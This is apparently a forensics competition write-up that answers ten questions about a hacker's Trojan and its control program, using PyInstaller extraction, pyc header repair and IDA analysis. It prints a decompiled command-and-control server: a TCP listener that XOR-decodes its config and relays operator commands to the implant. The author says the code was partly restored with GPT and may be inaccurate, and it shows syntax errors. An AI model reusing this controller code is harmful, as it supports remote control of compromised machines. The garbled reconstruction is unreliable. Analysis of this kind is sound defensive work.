Pangushi Final Binary Program Analysis
1. Analyze hacker computers, what is the control program transmission protocol? [Answer format: http]
tcp
The control file can be found directly in the hacker’s d drive
At a glance, it looks like a python file
python pyinstxtractor.py control end.exe
Generally speaking, the python exe is decompiled using pyinstxtractor.py as above
We can get a folder in which serve is the pyc file we want, but the file at this time cannot simply add .pyc. This behavior will cause the file to be unable to be decompiled.
The reason is that the corresponding version of the file header is missing (as shown below)
Because the file headers of different versions are different, you cannot directly copy the local ones, which is very uncomfortable.
So where is the header of this file?
here
Compare the position of E3
We can see that the 4-byte file header is 550D0D0A
We only need these 4 bytes but need to add 16 bytes in front to keep the position of E3 consistent.
At this point the file can be decompiled
Usually the following method is used
However, uncompyle6.exe only supports versions 3.8 and below.
So if you are connected to the Internet, just search for online tools or use pycdc
The effect is very average. Let’s take a detour.
Bytecode is fine
Use gpt to restore it bit by bit
It may not be accurate, but it can be read
# uncompyle6 version 3.8.0 # Python bytecode 3.8.0 (3413) # Decompiled from: Python 3.7.4 (tags/v3.7.4:e09359112e, Jul 8 2019, 20:34:20) [MSC v.1916 64 bit (AMD64)] # Embedded file name: server.py import socket,json def decrypt_config(): data_str = '' with open('config.txt', 'rb') as (f): byte = f.read(1) byte_to_int = int.from_bytes(byte, byteorder='big') data = byte_to_int ^ 41 dataB = data.to_bytes(1, byteorder='big') data_str + = dataB.decode() while byte: byte = f.read(1) if byte: byte_to_int = int.from_bytes(byte, byteorder='big') data = byte_to_int ^ 41 dataB = data.to_bytes(1, byteorder='big') data_str + = dataB.decode() data_dict = json.loads(data_str) return (data_dict['address'], data_dict['port']) def input_data() -> bytes: data = input('Please enter the command') data = Crypt_data(data) return data.encode() def Crypt_data(data) -> str: if isinstance(data, str): data = data.encode('utf-8') temp = b'' for i in data: data_int = i ^ int.from_bytes(b'p', byteorder='big') data_bytes = data_int.to_bytes(1, byteorder='big') temp + = data_bytes else: try: temp = temp.decode() except: temp=temp else: return temp def deal(data: bytes): with open('?.txt', 'wb + ') as (f): f.write(data) class connect: def __init__(self): self.address = decrypt_config() def tcpServer(self): with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as (s): s.bind(self.address) s.listen(10) while True: conn, addr = s.accept() conn.setblocking(0) while True: try: data = conn.recv(1000000) data = Crypt_data(data) except BlockingIOError as e: try: data = b'' finally: e = None del e else: print(data) if not data == '2a': if data == 'ok': send_data = input_data() conn.send(send_data) else: if data == 'er': print('!!!! Operation failed, please try again!!!!') send_data = input_data() conn.send(send_data) if data == 'end': continue elif data == b'': continue else: deal(data) if __name__ == '__main__': con = connect() con.tcpServer() # okay decompiling server.pyc
In the end, some parts couldn’t be translated, but it’s okay,
gpt also said it is obviously tcp
2. Analyzing the hacker computer, what is the size of the data buffer received by the control program? [Answer format:100]
1000000
Nothing to introduce
3. Analyze the hacker’s computer. How many instructions does the control program receive and judge? [Answer format: 1]
5
Five, notice that two are the same
4. Analyze the hacker computer, what is the command to end the connection of the control program? [Answer format:xxx]
end
There are two instructions to terminate the loop. The name is end.
5. Analyze hacker computers, what is the decryption function of the control end program configuration file? [Answer format: x_x]
decrypt_config
It can be determined based on the name and function body.
6. Analyze the hacker’s Trojan horse program. What is the program’s control end IP address? [Answer format:127.0.0.1]
192.168.100.141
No shell, go to ida first
But the address was not found in ida
Since I have the address, I will definitely send it.
Just try blind adjustment with od step.
It only took a few steps and it was successful.
7. Analyzing the hacker’s Trojan horse program, the program calls the Sleep function at address 0x00410CA4. How many seconds will the function pause? [Answer format: 3]
5
G jumps directly to the address
f5 disassembly
Right click and change format
5000 is 5 seconds
8. Analyze the hacker’s Trojan horse program. There are two pictures under the “png” type resource of the program. What is the MD5 value of the picture corresponding to the program icon? [Answer format: lowercase letters]
ae755aad5abaa7926a691a5d94e84ea2
Open with resource viewer
Just save and calculate the hash
9. Analyze the hacker’s Trojan horse program. Which function directly calls the HOST type resource? [Answer format:sub__1234]
sub_405570
View cross-references (ctrl+x) after searching directly within a string (shift+f12)
Found two
You can see that the first function loads resources
10. Analyze the hacker’s Trojan horse program. Which anti-virus software will this program bypass? [Answer format: Tencent]
Jinshan
Just search for the kill string directly
This exe is Jinshan virus